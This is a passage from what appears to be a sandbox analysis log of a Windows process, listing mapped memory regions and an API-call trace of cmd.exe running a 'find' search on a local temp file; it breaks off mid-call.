0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 316 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 317 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 318 start_va = 0x5e0000 end_va = 0x65dfff entry_point = 0x5e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 319 start_va = 0x7d0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 320 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 321 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 322 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 323 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 324 start_va = 0x7ed10000 end_va = 0x7ee0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed10000" filename = "" Region: id = 325 start_va = 0x3d0000 end_va = 0x3d3fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 326 start_va = 0xa90000 end_va = 0xd64fff entry_point = 0xa90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 6 os_tid = 0xacc [0034.823] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0034.823] __set_app_type (_Type=0x1) [0034.823] __p__fmode () returned 0x76ea1768 [0034.823] __p__commode () returned 0x76ea176c [0034.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0034.824] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0034.824] GetCurrentThreadId () returned 0xacc [0034.824] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xacc) returned 0x34 [0034.824] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0034.824] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0034.824] SetThreadUILanguage (LangId=0x0) returned 0x409 [0034.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0034.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x53fd1c | out: phkResult=0x53fd1c*=0x0) returned 0x2 [0034.826] VirtualQuery (in: lpAddress=0x53fd2b, lpBuffer=0x53fcc4, dwLength=0x1c | out: lpBuffer=0x53fcc4*(BaseAddress=0x53f000, AllocationBase=0x440000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0034.826] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x53fcc4, dwLength=0x1c | out: lpBuffer=0x53fcc4*(BaseAddress=0x440000, AllocationBase=0x440000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0034.826] VirtualQuery (in: lpAddress=0x441000, lpBuffer=0x53fcc4, dwLength=0x1c | out: lpBuffer=0x53fcc4*(BaseAddress=0x441000, AllocationBase=0x440000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0034.827] VirtualQuery (in: lpAddress=0x443000, lpBuffer=0x53fcc4, dwLength=0x1c | out: lpBuffer=0x53fcc4*(BaseAddress=0x443000, AllocationBase=0x440000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0034.827] VirtualQuery (in: lpAddress=0x540000, lpBuffer=0x53fcc4, dwLength=0x1c | out: lpBuffer=0x53fcc4*(BaseAddress=0x540000, AllocationBase=0x540000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0034.827] GetConsoleOutputCP () returned 0x1b5 [0034.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.827] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0034.827] _get_osfhandle (_FileHandle=1) returned 0x8c [0034.827] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x0) returned 0 [0034.827] _get_osfhandle (_FileHandle=1) returned 0x8c [0034.827] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0034.827] _get_osfhandle (_FileHandle=0) returned 0x24 [0034.827] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0034.828] GetEnvironmentStringsW () returned 0x7d4060* [0034.828] FreeEnvironmentStringsA (penv="=") returned 1 [0034.828] GetEnvironmentStringsW () returned 0x7d4060* [0034.828] FreeEnvironmentStringsA (penv="=") returned 1 [0034.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x53ec6c | out: phkResult=0x53ec6c*=0x44) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0xb2, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x1, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0x1, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x0, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x40, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x40, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0x40, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.828] RegCloseKey (hKey=0x44) returned 0x0 [0034.828] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x53ec6c | out: phkResult=0x53ec6c*=0x44) returned 0x0 [0034.828] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0x40, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x1, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0x1, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x0, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x9, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x4, lpData=0x53ec78*=0x9, lpcbData=0x53ec70*=0x4) returned 0x0 [0034.829] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x53ec74, lpData=0x53ec78, lpcbData=0x53ec70*=0x1000 | out: lpType=0x53ec74*=0x0, lpData=0x53ec78*=0x9, lpcbData=0x53ec70*=0x1000) returned 0x2 [0034.829] RegCloseKey (hKey=0x44) returned 0x0 [0034.829] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004e [0034.829] srand (_Seed=0x5aa5004e) [0034.829] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c find \"e\" \"C:\\FRS_TEMP\\temp.txt\"" [0034.829] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c find \"e\" \"C:\\FRS_TEMP\\temp.txt\"" [0034.829] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.829] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7d4068, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0034.829] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.829] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.829] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0034.829] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0034.829] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0034.829] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0034.829] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0034.829] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0034.829] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0034.830] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0034.830] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0034.830] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0034.830] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0034.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x53fa4c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x53fa4c, lpFilePart=0x53fa48 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x53fa48*="Desktop") returned 0x1c [0034.830] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0034.830] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x53f7c8 | out: lpFindFileData=0x53f7c8) returned 0x7d4278 [0034.830] FindClose (in: hFindFile=0x7d4278 | out: hFindFile=0x7d4278) returned 1 [0034.830] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x53f7c8 | out: lpFindFileData=0x53f7c8) returned 0x7d4278 [0034.830] FindClose (in: hFindFile=0x7d4278 | out: hFindFile=0x7d4278) returned 1 [0034.830] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0034.830] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x53f7c8 | out: lpFindFileData=0x53f7c8) returned 0x7d4278 [0034.831] FindClose (in: hFindFile=0x7d4278 | out: hFindFile=0x7d4278) returned 1 [0034.831] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0034.831] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0034.831] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0034.831] GetEnvironmentStringsW () returned 0x7d60b8* [0034.831] FreeEnvironmentStringsA (penv="=") returned 1 [0034.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0034.831] GetConsoleOutputCP () returned 0x1b5 [0034.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.832] GetUserDefaultLCID () returned 0x409 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x53fb78, cchData=128 | out: lpLCData="0") returned 2 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x53fb78, cchData=128 | out: lpLCData="0") returned 2 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x53fb78, cchData=128 | out: lpLCData="1") returned 2 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0034.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0034.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0034.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0034.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0034.833] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0034.834] GetConsoleTitleW (in: lpConsoleTitle=0x7d4d80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0034.834] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0034.834] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0034.834] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0034.835] _wcsicmp (_String1="find", _String2=")") returned 61 [0034.835] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0034.835] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0034.835] _wcsicmp (_String1="IF", _String2="find") returned 3 [0034.835] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0034.835] _wcsicmp (_String1="REM", _String2="find") returned 12 [0034.835] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0034.836] GetConsoleTitleW (in: lpConsoleTitle=0x53f868, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.836] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0034.836] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0034.836] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0034.836] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0034.836] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0034.836] _wcsicmp (_String1="find", _String2="CD") returned 3 [0034.837] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0034.837] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0034.837] _wcsicmp (_String1="find", _String2="REN") returned -12 [0034.837] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0034.837] _wcsicmp (_String1="find", _String2="SET") returned -13 [0034.837] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0034.837] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0034.837] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0034.837] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0034.837] _wcsicmp (_String1="find", _String2="MD") returned -7 [0034.837] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0034.837] _wcsicmp (_String1="find", _String2="RD") returned -12 [0034.837] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0034.837] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0034.837] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0034.837] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0034.837] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0034.837] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0034.837] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0034.837] _wcsicmp (_String1="find", _String2="VER") returned -16 [0034.837] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0034.837] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0034.837] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0034.837] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0034.837] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0034.837] _wcsicmp (_String1="find", _String2="START") returned -13 [0034.837] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0034.837] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0034.837] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0034.837] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0034.837] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0034.837] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0034.837] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0034.838] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0034.838] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0034.838] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0034.838] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0034.838] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0034.838] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0034.838] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="CD") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0034.838] _wcsicmp (_String1="find", _String2="REN") returned -12 [0034.838] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0034.838] _wcsicmp (_String1="find", _String2="SET") returned -13 [0034.838] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0034.838] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0034.838] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0034.838] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0034.838] _wcsicmp (_String1="find", _String2="MD") returned -7 [0034.838] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0034.838] _wcsicmp (_String1="find", _String2="RD") returned -12 [0034.838] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0034.838] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0034.838] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0034.838] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0034.838] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0034.838] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0034.838] _wcsicmp (_String1="find", _String2="VER") returned -16 [0034.838] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0034.838] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0034.838] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0034.838] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0034.838] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0034.838] _wcsicmp (_String1="find", _String2="START") returned -13 [0034.838] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0034.838] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0034.838] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0034.838] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0034.838] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0034.838] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0034.838] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0034.838] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0034.838] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0034.839] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0034.839] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0034.839] _wcsicmp (_String1="find", _String2="IF") returned -3 [0034.839] _wcsicmp (_String1="find", _String2="REM") returned -12 [0034.839] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0034.839] SetErrorMode (uMode=0x0) returned 0x0 [0034.839] SetErrorMode (uMode=0x1) returned 0x0 [0034.839] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7d60c0, lpFilePart=0x53f36c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x53f36c*="Desktop") returned 0x1c [0034.839] SetErrorMode (uMode=0x0) returned 0x1 [0034.839] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0034.840] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0034.845] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0034.847] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.847] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x53f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x53f0f8) returned 0xffffffff [0034.848] GetLastError () returned 0x2 [0034.848] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0034.848] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x53f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x53f0f8) returned 0x7d5468 [0034.848] FindClose (in: hFindFile=0x7d5468 | out: hFindFile=0x7d5468) returned 1 [0034.848] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x53f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x53f0f8) returned 0xffffffff [0034.848] GetLastError () returned 0x2 [0034.848] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x53f0f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x53f0f8) returned 0x7d5468 [0034.848] FindClose (in: hFindFile=0x7d5468 | out: hFindFile=0x7d5468) returned 1 [0034.848] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0034.848] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0034.848] GetConsoleTitleW (in: lpConsoleTitle=0x53f5f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.849] InitializeProcThreadAttributeList (in: lpAttributeList=0x53f520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x53f504 | out: lpAttributeList=0x53f520, lpSize=0x53f504) returned 1 [0034.849] UpdateProcThreadAttribute (in: lpAttributeList=0x53f520, dwFlags=0x0, Attribute=0x60001, lpValue=0x53f50c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x53f520, lpPreviousValue=0x0) returned 1 [0034.849] GetStartupInfoW (in: lpStartupInfo=0x53f558 | out: lpStartupInfo=0x53f558*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x8c, hStdError=0x2c)) [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.849] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0034.849] _wcsnicmp 